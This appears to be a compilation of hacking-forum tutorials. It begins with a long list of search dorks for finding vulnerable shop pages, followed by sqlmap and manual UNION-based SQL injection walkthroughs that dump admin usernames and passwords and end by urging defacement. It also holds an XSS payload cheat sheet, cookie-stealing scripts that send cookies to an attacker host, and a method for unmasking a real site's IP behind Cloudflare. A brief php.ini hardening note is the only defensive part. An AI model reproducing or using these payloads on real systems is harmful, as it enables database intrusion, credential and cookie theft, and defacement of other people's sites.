product.php?productid=
product.php?products_id=
product.php?proid=
product.php?rangeid=
product.php?shopprodid=
product.php?sku=
product.search.php?proid=
product/detail.asp?id=
product/detail.php?id=
product/list.asp?pid=
product/list.php?pid=
product/product.asp?cate=
product/product.asp?product_no=
product/product.php?cate=
product/product.php?product_no=
product2.php?id=
product3.php?id=
productDetail.php?prodId=
productDetails.asp?idProduct=
productDetails.cfm?idProduct=
productDetails.php?idProduct=
productDisplay.asp
productDisplay.cfm
productDisplay.php
productList.asp?cat=
productList.php?cat=
productList.php?id=
product_customed.php?pid=
product_detail.asp?product_id=
product_detail.cfm?id=
product_detail.php?id=
product_detail.php?prodid=
product_detail.php?product_id=
product_details.asp?id=
product_details.asp?prodid=
product_details.asp?product_id=
product_details.php?id=
product_details.php?prodID=
product_details.php?product_id=
product_guide/company_detail.php?id=
product_info.asp?id=
product_info.asp?item_id=
product_info.asp?products_id=
product_info.cfm?item_id=
product_info.php?id=
product_info.php?item_id=
product_info.php?products_id=
product_page.php?id=
product_ranges_view.asp?ID=
product_ranges_view.php?ID=
product_reviews.php?feature_id=
productdetail.php?id=
productdetails.php?prodId=
productinfo.asp?item=
productinfo.cfm?item=
productinfo.php?id=
productinfo.php?item=
productlist.asp?ViewType=Category&CategoryID=
productlist.asp?fid=
productlist.asp?grpid=
productlist.asp?id=
productlist.asp?tid=
productlist.cfm?ViewType=Category&CategoryID=
productlist.php?ViewType=Category&CategoryID=
productlist.php?fid=
productlist.php?grpid=
productlist.php?tid=
productpage.asp
productpage.cfm
productpage.php
productpage.php?ID=
products-display-details.asp?prodid=
products-display-details.php?prodid=
products.asp?DepartmentID=
products.asp?ID=
products.asp?act=
products.asp?cat=
products.asp?cat_id=
products.asp?categoryID=
products.asp?catid=
products.asp?groupid=
products.asp?keyword=
products.asp?openparent=
products.asp?p=
products.asp?rub=
products.asp?type=
products.cfm?ID=
products.cfm?keyword=
products.html?file=
products.php?DepartmentID=
products.php?act=
products.php?area_id=
products.php?cat=
products.php?catId=
products.php?cat_id=
products.php?categoryID=
products.php?cid=
products.php?groupid=
products.php?id=
products.php?keyword=
products.php?mainID=
products.php?openparent=
products.php?p=
products.php?page=
products.php?parent=
products.php?prod= .php?prod="
products.php?req=
products.php?rub=
products.php?*******=
products.php?sku=
products.php?sub=
products.php?subgroupid=
products.php?type=
products/?catID=
products/Blitzball.htm?id=
products/card.asp?prodID=
products/card.php?prodID=
products/category.php?id=
products/display_product.php?product_id=
products/index.asp?rangeid=
products/index.php?cat=
products/index.php?rangeid=
products/item_show.php?itemId=
products/model.php?id=
products/parts/detail.asp?id=
products/parts/detail.php?id=
products/product-list.asp?id=
products/product-list.php?id=
products/product.asp?id=
products/product.asp?pid=
products/product.php?article=
products/product.php?id=
products/product.php?pid=
products/productdetails.php?prodID=
products/products.asp?p=
products/products.php?cat=
products/products.php?p=
products/testimony.php?id=
products/treedirectory.asp?id=
productsByCategory.asp?intCatalogID=
productsByCategory.cfm?intCatalogID=
productsByCategory.php?intCatalogID=
products_category.asp?CategoryID=
products_category.cfm?CategoryID=
products_category.php?CategoryID=
products_connections_detail.php?cat_id=
products_detail.asp?CategoryID=
products_detail.cfm?CategoryID=
products_detail.php?CategoryID=
products_detail.php?id=
productsview.asp?proid=
productsview.php?proid=
productview.php?id=
produit.php?id=
produit.php?prod= .php?prod="
produkt.php?prod= .php?prod="
shop.asp?a=
shop.asp?action=
shop.asp?bookid=
shop.asp?cartID=
shop.asp?id=
shop.cfm?a=
shop.cfm?action=
shop.cfm?bookid=
shop.cfm?cartID=
shop.php?a=
shop.php?action=
shop.php?bookid=
shop.php?cartID=
shop.php?do=part&id=
shop.php?id_cat=
shop.php?prod= .php?prod="
shop.pl/page=
shop.pl/page= shop.pl/page=
shop/books_detail.asp?bookID=
shop/books_detail.php?bookID=
shop/category.asp?cat_id=
shop/category.php?cat_id=
shop/eventshop/product_detail.asp?itemid=
shop/eventshop/product_detail.php?itemid=
shop/home.php?cat=
shop/index.asp?cPath=
shop/index.php?cPath=
shop/index.php?cat_id=
shop/pages.php?page=
shop/product.php?id=
shop/product_details.php?ProdID=
shop/products.php?cat=
shop/products.php?cat_id=
shop/products.php?p=
shop/shop.php?id=
shop_category.php?id=
shop_details.asp?prodid=
shop_details.cfm?prodid=
shop_details.php?prodid=
shop_display_products.asp?cat_id=
shop_display_products.php?cat_id=
shopaddtocart.asp
shopaddtocart.asp?catalogid=
shopaddtocart.cfm
shopaddtocart.cfm?catalogid=
shopaddtocart.php
shopaddtocart.php?catalogid=
shopbasket.asp?bookid=
shopbasket.cfm?bookid=
shopbasket.php?bookid=
shopbycategory.asp?catid=
shopbycategory.cfm?catid=
shopbycategory.php?catid=
shopcafe-shop-product.asp?bookId=
shopcafe-shop-product.php?bookId=
shopcart.asp?title=
shopcart.cfm?title=
shopcart.php?title=
shopcreatorder.asp
shopcreatorder.cfm
shopcreatorder.php
shopcurrency.asp?cid=
shopcurrency.cfm?cid=
shopcurrency.php?cid=
shopdc.asp?bookid=
shopdc.cfm?bookid=
shopdc.php?bookid=
shopdisplaycategories.asp
shopdisplaycategories.cfm
shopdisplaycategories.php
shopdisplayproduct.asp?catalogid=
shopdisplayproduct.cfm?catalogid=
shopdisplayproduct.php?catalogid=
shopdisplayproducts.asp
shopdisplayproducts.cfm
shopdisplayproducts.php
shopexd.asp
shopexd.asp?catalogid=
shopexd.cfm
shopexd.cfm?catalogid=
shopexd.php
shopexd.php?catalogid=
shopping.php?id=
shopping/index.php?id=
shopping_article.php?id=
shopping_basket.asp?cartID=
shopping_basket.cfm?cartID=
shopping_basket.php?cartID=
shopprojectlogin.asp
shopprojectlogin.cfm
shopprojectlogin.php
shopquery.asp?catalogid=
shopquery.cfm?catalogid=
shopquery.php?catalogid=
shopremoveitem.asp?cartid=
shopremoveitem.cfm?cartid=
shopremoveitem.php?cartid=
shopreviewadd.asp?id=
shopreviewadd.cfm?id=
shopreviewadd.php?id=
shopreviewlist.asp?id=
shopreviewlist.cfm?id=
shopreviewlist.php?id=
shoptellafriend.asp?id=
shoptellafriend.cfm?id=
shoptellafriend.php?id=
shopthanks.asp
shopthanks.cfm
shopthanks.php
shopwelcome.asp?title=
shopwelcome.cfm?title=
shopwelcome.php?title=
shoutbox/expanded.php filetypep:hp
shoutbox/expanded.php?conf=
shoutbox/expanded.php?conf=
show-book.asp?id=
show-book.php?id=
show.asp?id=
show.php?*root*=
show.php?abre=
show.php?adresa=
show.php?b=
show.php?base_dir=
show.php?channel=
show.php?chapter=
show.php?cmd=
show.php?corpo=
show.php?d=
show.php?disp=
show.php?filepath=
show.php?get=
show.php?go=
show.php?header=
show.php?home=
show.php?id=
show.php?inc=
show.php?incl=
show.php?include=
show.php?index=
show.php?ir=
show.php?item=
show.php?j=
show.php?ki=
show.php?l=
show.php?left=
show.php?loader=
show.php?m=
show.php?mid=
show.php?middlePart=
show.php?modo=
show.php?module=
show.php?my=
show.php?n=
show.php?nivel=
show.php?oldal=
show.php?page1= .php?page1="
show.php?page=
show.php?pageweb=
show.php?pagina=
show.php?param=
show.php?path=
show.php?play=
show.php?pname=
show.php?pre=
show.php?product= .php?product=
show.php?product= show.php?product=
show.php?qry=
show.php?r=
show.php?read=
show.php?recipe=
show.php?redirect=
show.php?seccion=
show.php?second=
show.php?sp=
show.php?thispage=
show.php?to=
show.php?type=
show.php?x=
show.php?xlink=
show.php?z=
showPage.php?type=
showStore.asp?catID=
showStore.cfm?catID=
showStore.php?catID=
show_an.php?id=
show_bug.cgi?id=
show_cv.php?id=
show_item.asp?id=
show_item.cfm?id=
show_item.php?id=
show_item_details.asp?item_id=
show_item_details.cfm?item_id=
show_item_details.php?item_id=
show_news.php?cutepath=
show_news.php?id=
show_prod.php?p=
show_upload.php?id=
showbook.asp?bookid=
showbook.cfm?bookid=
showbook.php?bookid=
showfeature.asp?id=
showfeature.php?id=
showimg.php?id=
showmedia.php?id=
showproduct.asp?cat=
showproduct.asp?prodid=
showproduct.asp?productId=
showproduct.php?cat=
showproduct.php?prodid=
showproduct.php?productId=
showproducts.php?cid=
stockists_list.asp?area_id=
stockists_list.php?area_id=
store-detail.php?ID=
store-details.asp?id=
store-details.cfm?id=
store-details.php?id=
store.asp?cat_id=
store.asp?id=
store.cfm?id=
store.php?cat_id=
store.php?id=
store/customer/product.php?productid=
store/default.asp?cPath=
store/default.php?cPath=
store/description.asp?iddesc=
store/description.php?iddesc=
store/detail.php?prodid=
store/home.asp?cat=
store/home.php?cat=
store/index.asp?cat_id=
store/index.php?cat_id=
store/item.php?id=
store/mcart.php?ID=
store/news_story.php?id=
store/product.asp?productid=
store/product.php?productid=
store/products.php?cat_id=
store/showcat.php?cat_id=
store/store.php?cat_id=
store/store_detail.php?id=
store/view_items.asp?id=
store/view_items.php?id=
store_bycat.asp?id=
store_bycat.cfm?id=
store_bycat.php?id=
store_listing.asp?id=
store_listing.cfm?id=
store_listing.php?id=
store_prod_details.php?ProdID=
storefront.asp?id=
storefront.cfm?id=
storefront.php?id=
storefronts.asp?title=
storefronts.cfm?title=
storefronts.php?title=
storeitem.asp?item=
storeitem.cfm?item=
storeitem.php?item=
storemanager/contents/item.asp?page_code=
storemanager/contents/item.php?page_code=
viewCart.asp?userID=
viewCart.cfm?userID=
viewCart.php?userID=
viewcart.asp?CartId=
viewcart.cfm?CartId=
viewcart.php?CartId=
x/product.php?productid=
xcart/home.php?cat=
xcart/product.php?productid

#Anonymous_KnW

Hello Readers!!

This Time I Posted About SQLMAP(An Automated SQL-i Tool)

Introduction
Sqlmap is an open source penetration
testing tool that automates the process of
detecting and exploiting SQL injection flaws
and taking over of database servers. It comes
with a powerful detection engine, many
features for the ultimate penetration tester
and a broad range of switches lasting from
database fingerprinting, over data fetching
from the database, to accessing the
underlying file system and executing
commands on the operating system via out-
of-band connections. This is all about
sqlmap.

Procedure:
Now follow These steps to hack a website using
SQLMAP.
Step 1
Find SQLvulnerable site.
I will give you some dorks which may help you
finding websites vulnerable to SQL Injection.
Code:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=

Want more SQL- i dorks? ??
Go to  link

Step 2
Test if the website is vulnerable
To test if the website is vulnerable to Sqli just
add    '     at the end of the url.
And press enter.
Now we found the target. Now let's go ahead.

Step 3

Code:
Injection

Type this command in the terminal and hit
enter
Code:
sqlmap -u "www.yourtaget.com/
page.php?id=1" --dbs

Now we will get the database name of the
website.

We got the two database ohridhot_ohrid
and information_schema we will select
ohridhot_ohrid
database.

Let's get the tables of that database.
For that we need to enter this command on
terminal and after that hit Enter.
Code:
sqlmap -u "http://www.yourvictim/
page.php?id=1" -D ohridhot_ohrid --
tables

Now we will get the tables list which is stored
in the database we selected.

Now lets grab the columns from the admin
table , type on terminal:
Code:
sqlmap -u "http://www.yourvictim/
page.php?id=1" -D ohridhot_ohrid -T
admin --columns
Now we got the columns and we got user and
pass like on the image below

Now let's grab the user and pass

Code:
sqlmap -u "http://www.yourvictim/
page.php?id=1" -D ohridhot_ohrid -T
admin -C user,pass --dump

This will dump all usernames & passwords

In normals cases:-
User:- Jarvis
Pass:-Iron0man

Special cases: Hashed Usernames and
Passwords
Most websites will have their passwords
hashed as MD5
In this case you'll need to crack them.
Using some websites will help you
Here's a list of Hash cracking websites:
Code:
www.md5decrypter.co.uk/
www.md5this.com/
www.md5crack.com/
http://hashchecker.de/find.html
An MD5 Hash will look like this:
Code:
21232f297a57a5a743894a0e4a801fc3 --
32 characters
A SHA-1 Hash will look like this:
Code:
d033e22ae348aeb5660fc2140aec35850c4
da997 -- 40 characters
I'll make up a detailed tutorial on Hash
cracking soon.

Directory of sqlmap on Kali Linux
Places -> Computer -> Filesystem -> usr ->
share -> sqlmap -> output(here you got output)

That's all , I hope you enjoyed the tutorial.

#Anonymous_KnW

Hello Guys!
This time i am posting
About
"How to prevent from symlink ?"
so lets start

First step:-
Open your site control Panel.
Change permission for ln command.
Code:
sudo su
cd /bin
chmod 400 ln

Second step :-
Edit php.ini configuration
to search php.ini file
Code:
locate php.ini

Code:
edit php.ini

nano /etc/php5/apache2/php.ini search ” disable_functions ” and put in the list
disable_functions =
symlink,system,shell_exec,eval,exec,proc_get_status,proc_nice,proc_terminate,define_syslog_variables,syslog,openlog,closelog,escapeshellcmd,passthru,ocinumcols,ini_alter,leak,listen,chgrp,apache_note,apa
che_setenv,debugger_on,debugger_off,ftp_exec,dl,dll,ftp,myshellexec,proc_open,socket_bind,proc_close,
escapeshellarg,popen,fpassthru,php_uname,
pcntl_exec,

Final Step:-
Now restart the service .

Code:
/etc/init.d/php5 restart
/etc/init.d/apache2 restart

This make your server
is secure from symlink.

Thanx For Reading .

#Anonymous_KnW

Hello!
Now this time we discuss about SQL i

SQL injection is a very common method of
hacking websies in this era..
well, sql injection is a big thing, newbies think
that this is not a big
deal, as they can exploit this vulnerability with
scripts like
sqlmap, havij , sqlninja other kiddies scripts
but SQL injection can be a huge thing that it
can took many books to complete
So what you can DO with SQL injection
-->You can access records,
-->you can modify records
-->you can bypass Login areas
-->You can breach sql server

Okay  Here
our first step begins
Finding Vulnerable websites
well..if you are a hacker..You must know that
search engines are your best friends... we can
find vulnerable websites
using google dorks...?
common dorks are
inurl:/index.php?id=
inurl:/home.php?id=
inurl:/article.php?id=
inurl:/news.php?id=
etc there is a huge list of dorks
now if you search anyone of these.. you will
find many websites,
open any of them
and you will see url like
Code:
website.com/index.php?id=1
this could be random
okay to test that if site is vulnerable, just put
a ' at the end of url
and make it look like
Code:
website.com/index.php?id=1'
and if you see some error like
You have an error in your SQL syntax; check
the manual that corresponds to your MySQL
server
version for the right syntax to use near '\'' at
line 1
or
Warning: mysql_fetch_array()
or any mysql error... etc or if you see any
content of page missing
then the site is vulnerable

you see its mysql error..so the website is
vulnerable
So now lets move to next step
EXPLOITING the vulnerablity
now so we have find vuln website..its time to
fetching secret data
so what is our next step to find the
number of columns in the table
for that we replace ' with order by statment
like
Code:
website.com/index.php?id=1 order by
1--
website.com/index.php?id=1 order by
2--
website.com/index.php?id=1 order by
3--
website.com/index.php?id=1 order by
4--
we need to increase the order by number till
we get some error like
unknown column numbers or we found some
content missing in the page
example
Code:
http://www.corporate.com/
page.php?id=20 order by 1-- no error
http://www.corporate.com/
page.php?id=20 order by 2-- no error
http://www. corporate.com/
page.php?id=20 order by 3-- no error
http://www. corporate.com/
page.php?id=20 order by 10-- no error
Increse it one by one
http://www. corporate.com/
page.php?id=20 order by 20-- no error
http://www. corporate.com/
page.php?id=20 order by 21-- Error

CONTENT MISSING IN PAGE
SO NOW WE SEE THAT WE GOT ERROR AT
ORDER BY 21 , BUT NO ERROR AT ORDER BY
20,
SO THAT MEANS WE HAVE 20 COLUMNS
some times this thing never works, we dont
get error even at order by 1000
in that case we put ' at the end of id /
parameter and put + at the end
like
Code:
http://www. corporate.com/
page.php?id=20' order by 21--+ error

now next step begins
Union Select
NOW, we know we have 20 columns, now its
time to select all the columns using union
select
select statment is use to view data , if you
want to learn more about sql, you can check
my
article on working with SQL..
okay for now
we use statment like
Code:
http://www.corporate.com/
page.php?id=20 union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
now you will see any DIGIT of columns on
page
like 1 5 7 or anyone
if you dont see, place - before parameter value
example
Code:
http://www.corporate.com/
page.php?id=-20 union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
you can see in below picture
you can see 3 and 4 on the web page .. these
two are  vulnerable columns..

now its time to retrive data in these columns
we can retrive sensitive data .. we can call
functions for database name database(),
version info version() or @@version, user info
user(),
concat, group_concat(), LOAD_FILE etc and
many more
oka for the tutorial, i will call version function
in column 3 and db and user info in
column 4 using group_concat()...
for that i will use
Code:
http://www.corporate.com/
page.php?id=-20 union select
1,2,version(),group_concat(database
(),0x3a,user
()),5,6,7,8,9,10,11,12,13,14,15,1​
6,17,18,19,20--
I used 0x3a beacause its a hex value of
SEMICOLON ( ; ) AND it will seprate two
different values of different parameters
now u can see in the image the column 3 and
4 are now replace with values that I called
okay .. next thing
how to find all databases in the website ??
okay thats easy
now we need to replace column name with
query like this
Code:
http://www.corporate.com/
page.php?id=-20 union select
1,2,3,group_concat
(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
from information_schema.schemata--

now we know there are basicaly two
databases,
information_schema and cementco_cement
ignore information_schema
why? because information_schema are system
tables which define
databases.. we can use these tables to look at
the database layout style
okay now we have our database ( we dont
need to check, we can use its value actually, if
we are trying to dump in current database,,,
we can use
its function too.. database() instead of
cementco_cement.. its needed when we are
dumping in outside of current database
but in this case we will be simple dumping)
okay let now lets find the tables in current db
we will use WHERE , condtion in this query
now
we will fetch tables with select statement and
use where condtion to determine which
database tables we want to fetch
okay
syntax
Code:
http://www.corporate.com/
page.php?id=-20 union select
1,2,3,group_concat
(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
from information_schema.tables where
table_schema=database()--

now you can see we have all table names
which are
archive,corrigendum,eselling,login,login_hindi,login_private,news,tbl_complaint,​
tbl_email_sender,tbl_email_sender_hindi,tbl_email_sender_private,tbl_home_animat​
ion,tbl_home_private,tbl_pages,tbl_pages_hindi,tbl_pages_private,tbl_sub_pages,t​
bl_tnc,tender,tender2,tender3,tender_drawing,unit
now we gonna dump in sensitive table
which is login
okay...
lets dump it
now we will replace group_concat(table_name)
with group_concat(column_name) and
information_schema.tables with
information_schema.columns
and in where condtion we will change
table_schema with table_name
and will give parameter of table_name = name
of table in qoute like
table_name='login'
why used qoute? because its datatype is
varchar ..
sometimes it does not work
so we have to covert it into mysql char ... for
that i use hack bar
so now our query looks like
mysql char value of login is CHAR(108, 111,
103, 105, 110)
exmaple
Code:
http://www.corporate.com/
page.php?id=-20 union select
1,2,3,group_concat
(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
from information_schema.columns where
table_name=CHAR(108, 111, 103, 105,
110)--
yeah 
..now we can see columns of table
'login'
which
are ...id,username,password,email,date_added,lastlogin,sessionid,type,status
okayy...now the fun begins... time to dump
the columns...
for example if we need to dump username and
password columns from table 'login' we will
replace the query with
select group_concat
(username,0x3a,password) from login--
dumped
syntax
Code:
http://www.corporate.com/
page.php
?id=-20 union select
1,2,3,group_concat
(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,​
19,20 from login--
you can see username:password in the
webpage

now just find admin panel and Deface it.

I hope u enjoyed the tutorial.

[SUMMARY ]---------------------------------------------------------------------
0x01: Introduction
0x02: Origins
0x03: Types of XSS
\_ 0x03a: DOM-Based
\_ 0x03b: Non-Persistent
\_ 0x03c: Persistent
0x04: Appendix
---------------------------------------------------------------------------------
---[ 0x01: Introduction ]
Cross-site scripting (later commonly named
XSS to make difference from Cascading
Style Sheet) is a type of security vulnerability
that affects web applications
with not safely written code in not sanitized
input variables .
This kind of vulnerability allows an "attacker"
to inject some code into
the applications affected in order to bypass
access to the website or to apply
"phishing" on falls users (which is not
obviously our strict purpose )
As a matter of fact in vulnerables websites is
possible to execute HTML and
JavaScript codes from a not sanitized form,
which combined can be really
dangerous: it's possible to steal cookies or to
redirect webpages to builded
fake login in order to steal login usernames
and passwords.
This is commonly an underestimated problem
from websites masters, because actually
XSS cannot compromise actively the website
itself, but can only exploit ingenuous
users.
It will take time already to get webmasters
look out to this kinds of
vulnerabilities: meanwhile we evenly disfrute
them
-----------------------------------------------------------------------------
[/]
---[ 0x02: Origins ]
The name "Cross-Site Scripting" was conied by
Mark Slemko, the XSS pioneer,
and actually this name doesn't really reflect at
all the issues of this class of
vulnerability, and due to that he explained the
choice with the following answer:
"This issue isn't just about scripting, and there
isn't necessarily anything
cross-site about it. So why the name? It was
coined earlier on when the
problem was less understood, and it stuck.
Believe me, we have
had more important things to do than think of
a better name."
Touch?
By the way the name was early adopted, but
in the years it came useful to abbreviate
it to XSS in order to not confuse with
Cascading-Style Sheets and Content-Scrumble
Systems.
Starting from the Bugtraq community, the XSS
abbreviation became more and more
common as actually it is the "official"
reference to this vulnerability, and
obviously we will be conformed to this
tradiction
-----------------------------------------------------------------------------
[/]
---[ 0x03: Types of XSS ]
The term XSS is actually a bit elusive because
it includes differents kinds of
attacks that stands eachother on different
attacking mechanisms.
There are actually three types of Cross-Site
Scripting, commonly named as:
- DOM-Based XSS
- Non-persistent XSS
- Persistent XSS
Let's analize them one by one.
-----------------------------------------------------------------------------
[/]
------[ 0x03a: DOM-Based ]
The DOM-Based Cross-Site Scripting allow to
an attacker to work not on a victim
website but on a victim local machine: the
various operative system usually includes
"since born" some HTML pages created for
differents aims, but as long as the humans
do mistakes this HTML pages often can be
exploited due to code vulnerabilities.
The DOM-Based XSS exploits these problems
on users local machines in this way:
- The attacker creates a well builded malicious
website
- The ingenuous user opens that site
- The user has a vulnerable page on his
machine
- The attacker's website sends commands to
the vulnerable HTML page
- The vulnerable local page execute that
commands with the user's privileges
on that machine.
- The attacker easily gain control on the
victim computer.
As you can see it's quite simple practice, it's
just stands on brand new vulnerabilities
that comes out in the time, and there's never
lack
This kind of attack is really dangerous
because it operates on the victim system
strictly and as long as the user doesn't look
after his security issues and doesn't
apply updates, the DOM-Based XSS will work
fine.
Solution:
To prevent this kind of attacks there are only
two things to take care of:
- Doesn't visit untrusted website
- Keep your system up to date
-----------------------------------------------------------------------------
[/]
------[ 0x03b: Non-Persistent ]
The non-persistent XSS are actually the most
commons vulnerabilities that can
be found on the Net.
It's commonly named as "non-persistent"
because it works on an immediate HTTP
response from the victim website: it show up
when the webpage get the data provided
by the attacker's client to automatically
generate a result page for the attackers
himself.
Standing on this the attacker could provide
some malicious code and try to make
the server execute it in order to obtain some
result.
The most common applying of this kind of
vulnerability is in Search engines in
website: the attacker writes some arbitrary
HTML code in the search textbox and,
if the website is vulnerable, the result page
will return the result of these
HTML entities.
If this happens at 99% the Search engine will
execute also JavaScript arbitrary code.
For example assure that a website works like
this:
http://www.example.com/search.php?
text=TEXTTOSEARCH
Try to include some HTML tags in the "text"
variable:
http://www.example.com/search.php?
text=<img src="http://attacker.com/
image.jpg">
If the website is vulnerable it will display the
attacker's image into the result
webpage.
Try then to write some JavaScript code:
http:///www.example.com/search.php?
text=<script>alert(document.cookie)</script>
Probably the website will return an alert
popup with the current Cookie for the
site itself.
That's not good at all
As you will see the vulnerable website will
execute any JavaScript code you
want to be run: sometimes you can find that
the website make some filters on " "
and ' ', but that's not really a big problem for
us
This vulnerability can be used by the attacker
to steal informations to users
of the victim website providing them for
example an email with an URL like:
http://www.victim.com/search.php?
text=MALICIOUSCODE
To make that url less suspicious it will be
useful to encode the code in URL Hex value.
You can apply this tecnique using our
Playhack - Encoder service reachable at
http://encoder.playhack.net
(Beware that it's created for informational
purpose only ).
For example the code:
<script>alert("XSS")</script>
Encoded will look like:
%3C%73%63%72%69%70%74%3E%61%6C
%65%72%74%28%22%58%53%53%22%29%3B
%3C
%2F%73%63%72%69%70%74%3E
And as comes the malicious url will turn from:
http://www.victim.com/search.php?
text=&l...t>alert ("XSS")</script>
Into:
http://www.victim.com/search.php?text=
%3...2%74%28%22
%58%53%53%22%29%3B%3C%2F
%73%63%72%69%70%74%3E
Which, for a clueless user, it's lot less
suspicious than the first one.
Let's analize an example attack.
- The attacker realizes that the victim website
is vulnerable to XSS
- The attacker creates on his website an ad-
hoc page which is studied to steal
sensible informations like cookies or to make
a fake login of the victim website.
- The attacker provides to a user a crafted url
which contains a malicious
code like:
http://www.victim.com/search.php?text =
<script>document.location("http://
attackersite.com/fakelogin.php")</script>
Encoded in Hex.
- The user visits the webpage and is obscurely
redirect the attacker's fakelogin
- The user is invited to log into the system
and he does.
- The fakelogin steals the username and
password of the victim.
Solution:
The solution to this issue is simply to make a
check to the input code in the website
avoiding HTML tags or accepting alpha-
numerical characters only, with for example
codes like:
- Python: cgi.escape($code)
- PHP: eregi("[^a-zA-Z0-9_]", $code)
$code = htmlentities($code)
And many others.
-----------------------------------------------------------------------------
[/]
------[ 0x03c: Persistent ]
The persistent XSS vulnerabilities are similar
to the second type (Non-persistent XSS),
because both works on a victim site and tries
to hack users informations;
the difference is that in websites vulnerables
to Persistent XSS the attacker
doesn't need to provide the crafted url to the
users, because the website
itself permits to users to insert fixed data into
the system: this is the case
for example of "guestbooks" (what an awful
item !!)
Usually the users uses that kind of tool to
leave messages to the owned of the
website and at a first look it doesn't seems
something dangerous, but if an attacker
discover that the system is vulnerable can
insert some malicious code in his message
and let ALL visitors to be victim of that.
This works when the tool provided (the
guestbook in the example) doesn't do any
check
on the content of the inserted message: it just
inserts the data provided from the user
into the result page.
The attacker could easily insert as much code
as he wants into the tool, for example:
<img src="jdocument.location
('http://attacker.com/steal.php?cookie=' .
encodeURI(document.cookie));">
Which allow the attacker to steal the cookie of
the victim user.
This is just an example of lots of possible
injection that can be done in the
vulnerable site.
The Persistent XSS due to is fixed feature is
obviously more dangerous than
the others, because can easily affects lots of
users with an unique attack.
Solution:
The solution is the same of the Non-persistent
XSS.
-----------------------------------------------------------------------------
[/]
---[ 0x04: Appendix ]
In order to make the attack less suspicious it's
possible to "obfuscate" the IP
address of the attacker's website, encoding
the IP address with three formats:
- Dword Address
- Hex Address
- Octal Address
For example the ip address 127.0.0.1 will look
like:
- Dword: 2130706433
- Hex: 0x7f.0x00.0x00.0x01
- Octal: 0177.0000.0000.0001
Try for example:
http://0x7f.0x00.0x00.0x01/
And it will open your localhost webserver.
This tecnique is often used by XSS attacker
and in order to avoid to get caught
in attacker's trap, don't visit website that
doesn't contain a clear domain name
(and beware that is possible to fake that too
).
Here's a list of possible XSS cheats
<IMG SRC="jalert('XSS');">
<IMG SRC=jalert('XSS')>
<IMG
SRC=&#x22;&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;
&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x50;&#x4C;&#x41;&#x59;&#x48;
&#x41;&#x43;&#x4B;&#x2E;&#x4E;&#x45;&#x54;&#x27;&#x29;&#x22;>
<IMG SRC="jalert(String.fromCharCode
(88,83,83))">
<SCRIPT/XSS SRC="http://example.com/
xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<iframe src=http://example.com/
scriptlet.html <
<INPUT TYPE="IMAGE" SRC="jalert('XSS');">
<BODY BACKGROUND="jalert('XSS')">
<BODY ONLOAD=alert(document.cookie)>
<IMG DYNSRC="jalert('XSS')">
<IMG DYNSRC="jalert('XSS')">
<BR SIZE="&{alert('XSS')}">
<IMG SRC='vbscript:msgbox("XSS")'>
<TABLE BACKGROUND="jalert('XSS')">
<DIV STYLE="width: expression(alert('XSS'));">
<DIV STYLE="background-image: url(jalert
('XSS'))">
<STYLE TYPE="text/javascript">alert('XSS');</
STYLE>
<STYLE type="text/css">BODY{background:url
("jalert('XSS')")}</STYLE>
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
<A HREF="jdocument.location='http://
www.example.com/'">XSS</A>
-----------------------------------------------------------------------------
[/]
\======================================
[EOF]=====================================/
# Anonymous_KnW
Cookie Stealing:
<script>window.location=?http://127.0.0.1/
stealing.php?cookie=?+document.cookie</
script>

THANX FOR READING!!!!!!!!

Today i am going to share few methods i have
using to find the Real IP behing a
Cloudflare.We are going to discuss 4 different
methods here.
1-DNS Records And Ping.
For this method we are going to use
emillionforum.com as an example.
Code:
emillionforum.com
Using Multiple
IP's:173.245.60.62,173.245.60.157
Let us scan this site on network-tools.com .
Code:
IP address: 173.245.60.157
Host name: emillionforum.com
Alias:
emillionforum.com
173.245.60.157 is from United States
(US) in region North America
TraceRoute to 173.245.60.157
[emillionforum.com]
Hop    (ms)    (ms)    (ms)
IP Address    Host name
1 35 0 0
206.123.64.42      -
2 113 124 68
64.124.196.225
xe-4-2-0.er2.dfw2.us.above.net
3 4 3 2
206.223.118.61
equinix.tge9-3.ar1.dfw1.us.nlayer.net
4 0 0 1
69.31.63.182
as13335.xe-4-0-5.ar1.dfw1.us.nlayer.net
5 1 1 2
173.245.60.157
cf-173-245-60-157.cloudflare.com
Trace complete
Retrieving DNS records for
emillionforum.com...
DNS servers
hank.ns.cloudflare.com
[173.245.59.116]
ruth.ns.cloudflare.com
[173.245.58.143]
Answer records
emillionforum.com        NS    hank.ns.cloudflare.com    86400s
emillionforum.com        TXT    v=spf1
a mx include:websitewelcome.com
~all    300s
emillionforum.com        A    173.245.60.157    300s
emillionforum.com        SOA
server:    hank.ns.cloudflare.com
email:    dns@cloudflare.com
serial:    2012031313
refresh:    10000
retry:    2400
expire:    604800
minimum ttl:    3600
86400s
emillionforum.com        NS    ruth.ns.cloudflare.com    86400s
emillionforum.com        A    173.245.60.62    300s
emillionforum.com        MX
preference:    0
exchange:    direct-
connect.emillionforum.com
    300s
Authority records
Additional records
direct-
connect.emillionforum.com        A    174.120.63.195    300s
Here through this scan we got a subdomain of
emillionforum.com.
Code:
subdomain:direct-
connect.emillionforum.com
Lets ping it and see what happens.
Code:
Pinging direct-
connect.emillionforum.com
[174.120.63.195] with 32 bytes of
data:
Reply from 174.120.63.195: bytes=32
time=367ms TTL=44
Reply from 174.120.63.195: bytes=32
time=367ms TTL=44
Reply from 174.120.63.195: bytes=32
time=365ms TTL=44
Reply from 174.120.63.195: bytes=32
time=364ms TTL=44
Ping statistics for 174.120.63.195:
Packets: Sent = 4, Received = 4,
Lost = 0 (0% loss),
Approximate round trip times in
milli-seconds:
    Minimum = 364ms, Maximum =
367ms, Average = 365ms
So we got another IP now
Quote: 174.120.63.195
